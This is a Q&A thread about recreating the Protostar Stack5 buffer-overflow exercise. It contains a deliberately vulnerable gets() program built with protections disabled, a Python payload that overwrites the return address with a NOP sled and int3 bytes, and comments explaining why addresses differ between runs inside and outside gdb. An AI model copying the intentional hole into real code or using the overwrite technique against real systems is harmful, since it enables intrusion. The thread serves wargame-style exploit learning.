
Hello guys, I want to create a file similar to Stack5 in Protostar. The only problem is that when I execute a shellcode, or just \xCC, it only works in gdb.

The source code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char container[32];
  /* gets() performs no bounds check: input longer than 32 bytes overwrites
   * the saved ebp and return address (this is the intended overflow) */
  gets(container);
  return 0;
}

The command used to build the executable:

gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -m32  -g binary1.c -o binary1

For example, a \x90 interrupt:

import struct
import sys

# 32 bytes of buffer + 4 bytes of saved ebp = 36 bytes of padding
pad = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"
# overwrite the return address with the address of the payload on the stack
# (0xffffd6a0 was read from $esp in gdb at the ret instruction)
eip = struct.pack("I", 0xffffd6a0 + 4)
# NOP sled, four int3 breakpoints, NOP sled
payload = b"\x90" * 12 + b"\xCC" * 4 + b"\x90" * 12
# write raw bytes (Python 3); the trailing newline terminates gets()
sys.stdout.buffer.write(pad + eip + payload + b"\n")

All the results I get are only "Segmentation fault (core dumped)".


  • Working on Ubuntu x64 if it helps – MihaiDamian May 02 '18 at 21:22
  • Your source code would never compile. You'll get better answers if you show *actual* code. Also, where did you get the value `0xffffd6a0` from? – Employed Russian May 03 '18 at 00:26
  • @EmployedRussian Hello, ty for your answer. I got the address like this: I put a breakpoint on ret, then si, then got the address in the $esp register. Secondly, why do you say the code will never compile? (I will upload the executable shortly.) – MihaiDamian May 03 '18 at 03:50
  • It will not compile because the code does not have any function (e.g. int main() {...}). Also, as @EmployedRussian said, where did you get the value 0xffffd6a0 from? Because GDB could use these addresses for usability. Normally with ASLR you will not know these addresses. You should find a ROP gadget to execute your payload. – sinkmanu May 03 '18 at 09:09
  • Sorry I copied badly the main. Edited. – MihaiDamian May 03 '18 at 09:19
  • @sinkmanu ty for the 2 suggestions – MihaiDamian May 03 '18 at 09:21
  • @sinkmanu: in this wargame, [there is no ASLR nor NX](https://exploit-exercises.com/protostar/) (but it may be enabled in OP's virtual machine). This address found by OP may be wrong because of the offset induced by the system when running the binary inside or outside the debugger, environment variables and arguments being placed _before_ the stack (in higher addresses) in the process' memory. I would recommend using a bigger nopsled; no need for a ROP chain in this case. – swapgs May 06 '18 at 16:24
  • Possible duplicate of [Buffer overflow works in gdb but not without it](https://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it) – swapgs May 06 '18 at 16:24
  • @swapgs ty for the information and the link for the duplicate, really useful – MihaiDamian May 09 '18 at 07:41
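To see the offset swapgs describes, here is an added diagnostic (not code from the question or from Protostar): it prints where a 32-byte local buffer lands and how many bytes of argv and environment strings sit above it on the initial stack. Run it once from the shell and once under gdb (which adds variables such as LINES and COLUMNS to the inferior's environment) and compare; `vector_bytes` is a helper name chosen here.

```c
#include <stdio.h>
#include <string.h>

/* Bytes the kernel copies onto the initial stack for a NULL-terminated
 * string vector such as argv or envp: each string plus its NUL byte.
 * Every extra byte here pushes every later stack frame to a lower address. */
size_t vector_bytes(char **vec)
{
    size_t total = 0;
    for (size_t i = 0; vec[i] != NULL; i++)
        total += strlen(vec[i]) + 1;
    return total;
}

/* Prints the buffer address and the argv/env footprint for this run.
 * Build with the same flags as the target (-m32 -g ...) to get comparable
 * addresses, and compare a bare run against a run under gdb. */
int main(int argc, char **argv, char **envp)
{
    char container[32];
    printf("container at %p\n", (void *)container);
    printf("argv strings: %zu bytes, environment strings: %zu bytes\n",
           vector_bytes(argv), vector_bytes(envp));
    return 0;
}
```

The difference in "environment strings" between the two runs is the main reason an address read from $esp inside gdb does not match the address outside it.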

0 Answers